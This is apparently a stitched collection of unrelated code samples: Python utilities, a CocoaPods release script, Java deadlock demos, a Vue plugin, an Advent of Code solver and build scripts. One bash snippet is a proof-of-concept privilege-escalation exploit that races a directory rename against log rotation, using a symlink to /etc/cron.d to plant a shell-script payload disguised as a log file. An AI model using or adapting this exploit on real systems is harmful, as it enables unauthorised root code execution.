# [&callback] block invoked each time the event fires
def initialize(event, &callback)
type_strict event => Event, callback => :call
@event = event
@callback = callback
event.add_observer self
end
# Fire this listener's callback.
# ==== Args
# [*args] the event's arguments; EventListener.cancel! is passed as the block
# so a callback can abort further plugin processing.
def update(*args)
@callback.call(*args, &EventListener.method(:cancel!)) end
# Detach this listener from its event.
# ==== Return
# self
def detach
# NOTE(review): `count` is assigned but never used — looks like leftover
# debugging; confirm before removing.
count = @event.count_observers
@event.delete_observer(self)
self end
end
|
def print_fibonacci_sequence(n):
    """Print the first ``n`` Fibonacci numbers as a comma-separated line.

    n == 0 prints an explanatory message, n == 1 prints just "0"; otherwise
    the terms are printed as "0, 1, 1, 2, ..." terminated by a period.
    """
    if n == 0:
        print("The sequence cannot be printed as the given number of terms is 0.")
        return
    if n == 1:
        print("0")
        return
    # First two terms are printed up front; the loop emits the remaining n-2.
    prev, curr = 0, 1
    print("0, 1", end='')
    for _ in range(n - 2):
        prev, curr = curr, prev + curr
        print(',', curr, end='')
    print(".")
#!/bin/bash
# Proof-of-concept exploit: races a directory rename against a log-rotation
# step so that a crafted "log" file ends up under /etc/cron.d.
# NOTE(review): /tmp/rename and /home/user/run_cron are external helpers not
# shown here — presumably a renameat2-style swapper and a cron trigger; confirm.
cd /tmp
mkdir log
# Symlink that the rename race will swap into place of the log directory.
ln -s /etc/cron.d link
cd log
# Payload: a shell script disguised as a log file, padded to 1KB.
echo -e '#!/bin/bash\necho test > /tmp/x' > pwnme.log
perl -e 'print "A"x1024' >> pwnme.log
chmod 755 pwnme.log
chmod 555 .
# Continuously swap /tmp/log <-> /tmp/link in the background.
/tmp/rename /tmp/log /tmp/link &
# Retry loop: trigger the rotation, restore the payload name, and stop once
# pwnme.log has been rotated away (i.e. the race was won).
for i in {1..100}; do
/home/user/run_cron
sleep 0.1
chmod u+w .
mv pwnme.log.1 pwnme.log 2>/dev/null
chmod u-w .
if [ ! -f pwnme.log ]; then
break;
fi
done
|
#!/bin/sh
# Release script configuration for the PactConsumerSwift pod.
REMOTE_BRANCH=master
POD_NAME=PactConsumerSwift
PODSPEC=PactConsumerSwift.podspec
RELEASE_NOTES=CHANGELOG.md
# Cocoapods executable; override via the COCOAPODS env var.
POD=${COCOAPODS:-"pod"}
# Print usage information and exit with status 2.
# Uses the portable name() definition form — the original "function help {"
# is a bashism that is not valid under this file's #!/bin/sh shebang.
help() {
  echo "Usage: release VERSION RELEASE_NAME DRY_RUN"
  echo
  echo "VERSION should be the version to release, should not include the 'v' prefix"
  echo "RELEASE_NAME should be the type of release 'Bugfix Release / Maintenance Release'"
  echo
  echo "FLAGS"
  echo "  -d  Dry run, won't push anything or publish cocoapods"
  echo
  echo "  Example: ./scripts/release.sh 1.0.0 'Bugfix Release'"
  echo
  exit 2
}
# Print an error message and abort with status 1.
# Portable name() form (the "function" keyword is a bashism under #!/bin/sh);
# "$*" joins all arguments into one message, and diagnostics go to stderr.
die() {
  echo "[ERROR] $*" >&2
  echo >&2
  exit 1
}
# Require at least VERSION and RELEASE_NAME arguments.
if [ $# -lt 2 ]; then
  help
fi

VERSION=$1
RELEASE_NAME=$2
DRY_RUN=$3
VERSION_TAG="v$VERSION"

echo "-> Verifying Local Directory for Release"

if [ -z "`which $POD`" ]; then
  die "Cocoapods is required to produce a release. Aborting."
fi
echo " > Cocoapods is installed"

echo " > Is this a reasonable tag?"

# Reject a doubled prefix (user passed "v1.0.0" and we prepended another 'v').
echo $VERSION_TAG | grep -q "^vv"
if [ $? -eq 0 ]; then
  die "This tag ($VERSION) is an incorrect format. You should remove the 'v' prefix."
fi

# Validate semver-ish form. POSIX ERE has no \d or \w classes — the original
# pattern used them, and GNU grep -E treats them literally, so every valid
# tag failed this check. Use explicit bracket expressions instead.
echo $VERSION_TAG | grep -q -E "^v[0-9]+\.[0-9]+\.[0-9]+(-[A-Za-z0-9_]+(\.[0-9])?)?\$"
if [ $? -ne 0 ]; then
  die "This tag ($VERSION) is an incorrect format. It should be in 'v{MAJOR}.{MINOR}.{PATCH}(-{PRERELEASE_NAME}.{PRERELEASE_VERSION})' form."
fi

echo " > Is this version ($VERSION) unique?"
git describe --exact-match "$VERSION_TAG" > /dev/null 2>&1
if [ $? -eq 0 ]; then
  die "This tag ($VERSION) already exists. Aborting."
else
  echo " > Yes, tag is unique"
fi

# Prepend a new section (commits since the last version tag) to the changelog.
echo " > Generating release notes to $RELEASE_NOTES"
cp $RELEASE_NOTES ${RELEASE_NOTES}.backup
echo "# ${VERSION} - ${RELEASE_NAME}\n" > ${RELEASE_NOTES}.next
LATEST_TAG=`git describe --abbrev=0 --tags --match=v[0-9].[0-9].[0-9]`
git log --pretty='* %h - %s (%an, %ad)' ${LATEST_TAG}..HEAD . >> ${RELEASE_NOTES}.next
cat $RELEASE_NOTES.next | cat - ${RELEASE_NOTES}.backup > ${RELEASE_NOTES}
rm ${RELEASE_NOTES}.next
rm ${RELEASE_NOTES}.backup
git add $RELEASE_NOTES || { die "Failed to add ${RELEASE_NOTES} to INDEX"; }

if [ ! -f "$PODSPEC" ]; then
  die "Cannot find podspec: $PODSPEC. Aborting."
fi
echo " > Podspec exists"

# Verify cocoapods trunk ownership
pod trunk me | grep -q "$POD_NAME" || die "You do not have access to pod repository $POD_NAME. Aborting."
echo " > Verified ownership to $POD_NAME pod"

echo "--- Releasing version $VERSION (tag: $VERSION_TAG)..."
# Restore the podspec from its .backup copy, if one exists (undo for a failed
# sed edit). Uses explicit names rather than the original's
# "${PODSPEC}{.backup,}" brace expansion, which is a bashism and does not
# expand under this file's #!/bin/sh shebang; also drops the "function" keyword.
restore_podspec() {
  if [ -f "${PODSPEC}.backup" ]; then
    mv -f "${PODSPEC}.backup" "${PODSPEC}"
  fi
}
# Refuse to release from a branch that has diverged from origin.
echo "-> Ensuring no differences to origin/$REMOTE_BRANCH"
git fetch origin || die "Failed to fetch origin"
git diff --quiet HEAD "origin/$REMOTE_BRANCH" || die "HEAD is not aligned to origin/$REMOTE_BRANCH. Cannot update version safely"
echo "-> Setting podspec version"
# SET_PODSPEC_VERSION is 0 when the podspec already carries this version.
cat "$PODSPEC" | grep 's.version' | grep -q "\"$VERSION\""
SET_PODSPEC_VERSION=$?
if [ $SET_PODSPEC_VERSION -eq 0 ]; then
echo " > Podspec already set to $VERSION. Skipping."
else
# sed -i.backup keeps the pre-edit podspec so restore_podspec can undo on failure.
sed -i.backup "s/s.version *= *\".*\"/s.version = \"$VERSION\"/g" "$PODSPEC" || {
restore_podspec
die "Failed to update version in podspec"
}
git add ${PODSPEC} || { restore_podspec; die "Failed to add ${PODSPEC} to INDEX"; }
git commit -m "chore: Bumping version to $VERSION" || { restore_podspec; die "Failed to push updated version: $VERSION"; }
fi
echo "-> Tagging version"
# The generated release notes become the (annotated) tag message.
git tag "$VERSION_TAG" -F "$RELEASE_NOTES" || die "Failed to tag version"
if [ -z "$DRY_RUN" ]; then
echo "-> Pushing tag to origin"
git push origin "$VERSION_TAG" || die "Failed to push tag '$VERSION_TAG' to origin"
# Only push the branch when we actually committed a version bump above.
if [ $SET_PODSPEC_VERSION -ne 0 ]; then
git push origin "$REMOTE_BRANCH" || die "Failed to push to origin"
echo " > Pushed version to origin"
fi
echo
echo "---------------- Released as $VERSION_TAG ----------------"
echo
echo
echo "Pushing to pod trunk..."
$POD trunk push "$PODSPEC" --allow-warnings
else
# Dry run: lint the podspec instead of publishing.
echo "-> Dry run specified, skipping push of new version"
$POD spec lint "$PODSPEC" --allow-warnings
fi
rm ${PODSPEC}.backup
<filename>src-ts/7.2.ts
import * as fs from "fs";
import * as rd from "readline";
import * as path from "path";
// Advent-of-Code day 7 part 2 style solver: read comma-separated crab
// positions, then find the alignment position minimising triangular-number
// fuel cost. The search window is bounded by the data's mean and median.
var filenPath1 = path.join(__dirname, "..", "text-assets", "7.1.mine.txt");
console.log(`filenPath1: ${filenPath1}`);
var reader1 = rd.createInterface(fs.createReadStream(filenPath1));
var crabs: Array<number> = [];
// Accumulate every comma-separated integer from the input file.
reader1.on("line", (l: string) => {
// console.log(`l: ${l} `);
const tokens = l.split(",");
tokens.forEach((x) => {
crabs.push(parseInt(x));
});
});
reader1.on("close", () => {
console.log(`Data has been read ${crabs.length}`);
let sortedcrabs: number[] = crabs.sort((n1, n2) => n1 - n2);
// console.log(sortedcrabs);
let p = 0;
if (sortedcrabs.length % 2) {
p = (sortedcrabs.length + 1) / 2;
} else {
p = sortedcrabs.length / 2;
}
// NOTE(review): for odd-length arrays this averages elements p-1 and p, which
// is not the textbook median — harmless here since it only seeds the search
// window below, but confirm before reusing this as a median routine.
let median = (sortedcrabs[p - 1] + sortedcrabs[p]) / 2;
let total = sortedcrabs.reduce((x, y) => x + y, 0);
let mean = Math.round(total / sortedcrabs.length);
console.log(`sortedcrabs.length: ${sortedcrabs.length} p: ${p}`);
console.log(
`sortedcrabs[p-1]: ${sortedcrabs[p - 1]}
sortedcrabs[p]: ${sortedcrabs[p]}
median: ${median} mean: ${mean} `
);
// Exhaustively evaluate every candidate position in [start-1, end+1].
let leastfuel = Infinity;
let location = 0;
let start = mean < median ? mean : median;
let end = mean > median ? mean : median;
for (let i = start - 1; i < end + 2; i++) {
let fuel = 0;
for (let j = 0; j < sortedcrabs.length; j++) {
let distance = Math.abs(sortedcrabs[j] - i);
//sum of 1 to n = (n * (n+1)) / 2;
fuel += (distance * (distance + 1)) / 2;
}
// console.log(` location: ${i} answer: ${fuel} `);
if (fuel < leastfuel) {
leastfuel = fuel;
location = i;
}
}
// console.log(crabs);
console.log(`location: ${location} answer: ${leastfuel} `);
// 98905974 too high
});
|
package com.atjl.util.thread;
import com.atjl.util.collection.CollectionUtil;
import com.atjl.util.common.SystemUtil;
import com.atjl.util.thread.task.BaseTask;
import org.junit.Test;
import java.util.concurrent.CountDownLatch;
import java.util.concurrent.locks.ReentrantLock;
/**
 * Manual demonstrations of latch usage and classic deadlock scenarios using a
 * project thread-pool (ThreadPoolManager). These "tests" intentionally block:
 * the deadlock cases sleep forever and are meant to be observed with a
 * thread dump, not run in CI.
 */
public class LockTest {
@Test
public void testCountDown() {
String pool = "P1";
ThreadPoolManager.init(CollectionUtil.newList(pool + ThreadConstant.IO_POOL_PARAM));
// NOTE(review): the latch is created with count 10 but only one task calls
// countDown(), so both await() calls below block indefinitely — presumably
// intentional for observing blocked threads; confirm.
CountDownLatch c = new CountDownLatch(10);
ThreadPoolManager.execute(pool, new BaseTask() {
@Override
protected void bizRun() {
c.countDown();
}
});
ThreadPoolManager.execute(pool, new BaseTask() {
@Override
protected void bizRun() {
try {
c.await();
} catch (InterruptedException e) {
e.printStackTrace();
}
}
});
try {
c.await();
} catch (InterruptedException e) {
e.printStackTrace();
}
}
/**
 * synchronized dead lock
 */
public static final String A = "A";
public static final String B = "B";
public static final String C = "C";
@Test
public void testSyncDeadLock() {
String pool = "P1";
ThreadPoolManager.init(CollectionUtil.newList(pool + ThreadConstant.IO_POOL_PARAM));
// Latch makes both tasks start their lock acquisition at the same time,
// maximising the chance of the A->B vs C->B->A deadlock.
CountDownLatch c = new CountDownLatch(2);
ThreadPoolManager.execute(pool, new BaseTask() {
@Override
protected void bizRun() {
c.countDown();
try {
c.await();
} catch (InterruptedException e) {
e.printStackTrace();
}
// Lock order: A, then B, then C.
synchronized (A) {
SystemUtil.sleep(1000);
synchronized (B) {
synchronized (C) {
System.out.println("get A,B");
}
}
}
}
});
ThreadPoolManager.execute(pool, new BaseTask() {
@Override
protected void bizRun() {
c.countDown();
try {
c.await();
} catch (InterruptedException e) {
e.printStackTrace();
}
// Opposite lock order: C, then B, then A -> deadlock with the task above.
synchronized (C) {
SystemUtil.sleep(1000);
synchronized (B) {
synchronized (A) {
System.out.println("get B,A");
}
}
}
}
});
// Keep the JVM alive so the deadlock can be inspected; "end" never prints.
SystemUtil.sleepForever();
System.out.println("end");
}
/**
 * ReentrantLock dead lock
 */
@Test
public void testDeadLock() {
ReentrantLock l1 = new ReentrantLock();
ReentrantLock l2 = new ReentrantLock();
String pool = "P1";
ThreadPoolManager.init(CollectionUtil.newList(pool + ThreadConstant.IO_POOL_PARAM));
CountDownLatch c = new CountDownLatch(2);
ThreadPoolManager.execute(pool, new BaseTask() {
@Override
protected void bizRun() {
c.countDown();
try {
c.await();
} catch (InterruptedException e) {
e.printStackTrace();
}
// Acquisition order l1 -> l2.
l1.lock();
SystemUtil.sleep(1000);
l2.lock();
System.out.println("get A,B");
l2.unlock();
l1.unlock();
}
});
ThreadPoolManager.execute(pool, new BaseTask() {
@Override
protected void bizRun() {
c.countDown();
try {
c.await();
} catch (InterruptedException e) {
e.printStackTrace();
}
// Opposite order l2 -> l1 -> deadlock with the task above.
l2.lock();
SystemUtil.sleep(1000);
l1.lock();
System.out.println("get B,A");
l1.unlock();
l2.unlock();
}
});
// Keep the JVM alive so the deadlock can be inspected; "end" never prints.
SystemUtil.sleepForever();
System.out.println("end");
}
}
|
/**
 * Vue plugin providing a "fixed" positioned tag for Weex.
 * @author vfasky<<EMAIL>>
 *
 **/
'use strict'
import { clear } from './reg'
import component from './fixed'
declare var require
export default {
install(Vue) {
// Expose a global helper to clear all registered fixed elements.
Vue.fixedClear = function() {
clear()
}
// Pick the render implementation matching the current Weex platform:
// web builds and native builds ship different compiled renderers.
let fixed
if (String(weex.config.env.platform).toLowerCase() == 'web'){
fixed = require('../dist/weex-vue-fixed.js')
} else {
fixed = require('../dist/weex-weex-fixed.js')
}
component.render = fixed.render
// Register the component globally as <wv-fixed>.
Vue.component('wv-fixed', component)
}
}
def isAnagram(str1, str2):
    """Return True when the two strings are anagrams of each other.

    Spaces are ignored and comparison is case-insensitive.
    """
    # Normalise: strip spaces, fold case.
    first = str1.replace(" ", "").lower()
    second = str2.replace(" ", "").lower()
    # Different lengths can never be anagrams.
    if len(first) != len(second):
        return False
    # Tally characters of the first string...
    frequency = {}
    for ch in first:
        frequency[ch] = frequency.get(ch, 0) + 1
    # ...then consume them with the second string's characters.
    for ch in second:
        if ch not in frequency:
            return False
        frequency[ch] -= 1
    # Anagrams leave every tally at exactly zero.
    return all(remaining == 0 for remaining in frequency.values())
# Test
# Smoke test: 'abc' and 'cab' contain the same letters.
str1 = 'abc'
str2 = 'cab'
print(isAnagram(str1, str2)) # Output: True
#! /bin/bash
# Launch a PyDM inline-motor screen for each configured EPICS motor PV.
# Activate the conda environment that provides pydm.
. /opt/conda/etc/profile.d/conda.sh
conda activate pydm
# Run from this script's directory, where the .ui files live.
cd $(dirname $0)
echo "PyDM .ui files dir": $(pwd)
# Each entry is a JSON macro string mapping MOTOR to an EPICS PV name.
for motor in '{"MOTOR": "XF:12IDC-ES:2{WAXS:1-Ax:Arc}Mtr"}' \
'{"MOTOR": "XF:12IDC-OP:2{HEX:PRS-Ax:Rot}Mtr"}'; do
echo "Starting $motor..."
# Backgrounded; all pydm output is discarded.
pydm --hide-nav-bar -m "$motor" inline_motor.ui > /dev/null 2>&1 &
done
|
/**
 * Count the number of distinct tag strings (e.g. "<div>", "</p>") appearing
 * in an HTML string. Scans character by character: text between '<' and the
 * next '>' (inclusive) is collected as one tag. Opening and closing tags are
 * counted separately, and duplicates are ignored via a Set.
 */
function countUniqueHTMLTags(htmlString) {
    const seenTags = new Set();
    let buffer = '';
    let capturing = false;
    for (const ch of htmlString) {
        if (ch === '<') {
            // A '<' always (re)starts tag capture.
            capturing = true;
            buffer = '<';
        } else if (ch === '>') {
            // '>' terminates the tag and records it.
            capturing = false;
            seenTags.add(buffer + '>');
            buffer = '';
        } else if (capturing) {
            buffer += ch;
        }
    }
    return seenTags.size;
}
// Demo: drive an Overtimer (3s duration, 1s delay, 10 repeats, 100ms poll)
// and live-render its progress percentages on each poll tick.
const Overtimer = require('./../../src/overtimer')
console.log('Starting timer...')
const t = new Overtimer(3000, {poll: 100, delay: 1000, debug: true, repeat: 10, start: false})
t.on('poll', function() {
// ANSI escapes: clear the terminal and move the cursor to the top-left
// so each poll overwrites the previous readout.
process.stdout.write("\u001b[0J\u001b[1J\u001b[2J\u001b[0;0H\u001b[0;0W")
console.log(`Current Repeat Percent: ${t.currentRepeatPercent.toFixed(2)}`)
console.log(`Current Repeat Percent With Delay: ${t.currentRepeatPercentWithDelay.toFixed(2)}`)
console.log(`Total Percent: ${t.totalPercent.toFixed(2)}`)
console.log(`Total Percent With Delay: ${t.totalPercentWithDelay.toFixed(2)}`)
})
// start:false above means the timer only runs once started explicitly.
t.start()
|
<reponame>vadi2/codeql
// CodeQL documentation example: the method below is deliberately named
// 'hashcode' (lowercase 'c'), so it does NOT override Object.hashCode().
// Do not "fix" the name — the mismatch is the bug pattern being illustrated.
public class Person
{
private String title;
private String forename;
private String surname;
// ...
public int hashcode() { // The method is named 'hashcode'.
int hash = 23 * title.hashCode();
hash ^= 13 * forename.hashCode();
return hash ^ surname.hashCode();
}
}
#!/bin/bash
# Build the MySQL 5.7 binlog image from the local Dockerfile; --no-cache
# forces a full rebuild so configuration changes always take effect.
docker build -t diegopacheco/mysql57binlog:v1 . --no-cache
|
#!/bin/sh
# CI setup: install the Android SDK components needed for the build, deploy
# them to the local Maven repository, and install the support-v4 artifact.
set -e
# "echo y" auto-accepts the SDK license prompts.
echo "y" | android update sdk --no-ui --filter platform-tools,tools
echo "y" | android update sdk --no-ui --filter build-tools-20.0.0
echo "y" | android update sdk --no-ui --filter android-18
echo "y" | android update sdk --no-ui --filter addon-google_apis-google-18,extra-android-support
# maven-android-sdk-deployer publishes the installed SDK jars to ~/.m2.
git clone --depth 1 https://github.com/mosabua/maven-android-sdk-deployer.git
cd maven-android-sdk-deployer
mvn install -P 4.3
cd -
rm -rf maven-android-sdk-deployer
# Locate support-v4: prefer the m2repository copy, fall back to the legacy path.
jarLocation="$ANDROID_HOME/extras/android/m2repository/com/android/support/support-v4/19.0.1/support-v4-19.0.1.jar"
if [ ! -f "$jarLocation" ]; then
jarLocation="$ANDROID_HOME/extras/android/support/v4/android-support-v4.jar"
if [ ! -f "$jarLocation" ]; then
echo "support-v4 artifact not found!";
exit 1;
fi
fi
echo "Installing com.android.support:support-v4 from $jarLocation"
mvn -q install:install-file -DgroupId=com.android.support -DartifactId=support-v4 \
-Dversion=19.0.1 -Dpackaging=jar -Dfile="$jarLocation"
echo "Done!"
|
class PostfixEvaluator:
    """Evaluate postfix (RPN) expressions of single-digit operands.

    Supported operators: + - * / (true division). Any other non-digit
    character pops two operands and pushes 0, matching the original's
    default-result behaviour.
    """

    def __init__(self):
        # Operand / intermediate-result stack.
        self.stack = []

    def evaluate(self, expression):
        """Evaluate ``expression`` character by character and return the result."""
        for token in expression:
            if token.isdigit():
                # Operands go straight onto the stack.
                self.stack.append(int(token))
                continue
            # Operator: right-hand operand was pushed last.
            rhs = self.stack.pop()
            lhs = self.stack.pop()
            if token == '+':
                value = lhs + rhs
            elif token == '-':
                value = lhs - rhs
            elif token == '*':
                value = lhs * rhs
            elif token == '/':
                value = lhs / rhs
            else:
                # Unknown operator: original behaviour pushes 0.
                value = 0
            self.stack.append(value)
        # Final result sits on top of the stack.
        return self.stack.pop()
<gh_stars>0
'use strict'
const { Todo } = require('../models')
// Authorization middleware: only the owner of the Todo identified by
// req.params.id (owner taken from the decoded auth token) may proceed.
module.exports = {
authorization (req, res, next) {
// The query already filters by both _id and UserId, so a match implies
// ownership. An invalid ObjectId rejects the promise and lands in catch(next).
Todo.findOne({ _id: req.params.id, UserId: req.decoded.id })
.then((todo) => {
if (todo) {
// NOTE(review): this re-check is redundant given the UserId filter in the
// query above — the else branch appears unreachable; confirm before relying on 401s.
if (String(todo.UserId) === String(req.decoded.id)) {
next()
} else {
next({ status: 401, message: 'Unauthorized process!' })
}
} else {
next({ status: 404, message: 'Todo is not found' })
}
}).catch(next)
}
}
|
import uuid


def create_unique_key():
    """Return a random 32-character lowercase hex key (a UUID4 without dashes)."""
    # format(..., '032x') zero-pads to 32 hex digits, identical to uuid4().hex.
    return format(uuid.uuid4().int, '032x')


generated_key = create_unique_key()
print(generated_key)
# Example output: d6e4ee62ac7f436fb6d25ec40f7db1f6
// Simple immutable-style holder for a network endpoint (full URL plus
// host/port components). NOTE(review): the class body continues beyond this
// excerpt — its closing brace is not visible here.
public class NetworkUrl {
private String url;
private String host;
private Integer port;
// Stores the given URL, host and port as-is; no validation is performed.
public NetworkUrl(String url, String host, Integer port) {
this.url = url;
this.host = host;
this.port = port;
}
public String getUrl() {
return url;
}
public String getHost() {
return host; // Complete implementation to return the host
}
public Integer getPort() {
return port; // Complete implementation to return the port
}
<filename>cyder/cydns/domain/tests/basedomain.py
from django.test import TestCase
from cyder.core.ctnr.models import Ctnr
from cyder.cydhcp.constants import STATIC
from cyder.cydhcp.network.models import Network
from cyder.cydhcp.range.models import Range
from cyder.cydns.domain.models import Domain
from cyder.cydns.tests.utils import DNSTest, make_root
# Shared test fixture: builds a minimal DNS/DHCP environment (a reverse zone,
# a rooted forward domain, a /29 network and a static range) for domain tests.
class BaseDomain(DNSTest):
def setUp(self):
super(BaseDomain, self).setUp()
# Reverse zone for 128.0.0.0/8 addresses.
Domain.objects.create(name="128.in-addr.arpa")
# create_recursive also creates the parent 'poo' domain as needed.
self.f_c = Domain.create_recursive(name='foo.poo')
make_root(self.f_c)
# Small network with a 4-address static range inside it.
self.net = Network.objects.create(network_str='10.2.3.0/29')
self.sr = Range.objects.create(
network=self.net, range_type=STATIC, start_str='10.2.3.1',
end_str='10.2.3.4')
|
module.exports = function(document) {
document = document.toObject && document.toObject() || document
document.id = document._id.toString()
typeof document._id !== 'undefined' && delete document._id
typeof document.__v !== 'undefined' && delete document.__v
typeof document.password !== 'undefined' && delete document.password
typeof document.verificationCode !== 'undefined' && delete document.verificationCode
typeof document.verifyed !== 'undefined' && delete document.verifyed
return document
} |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.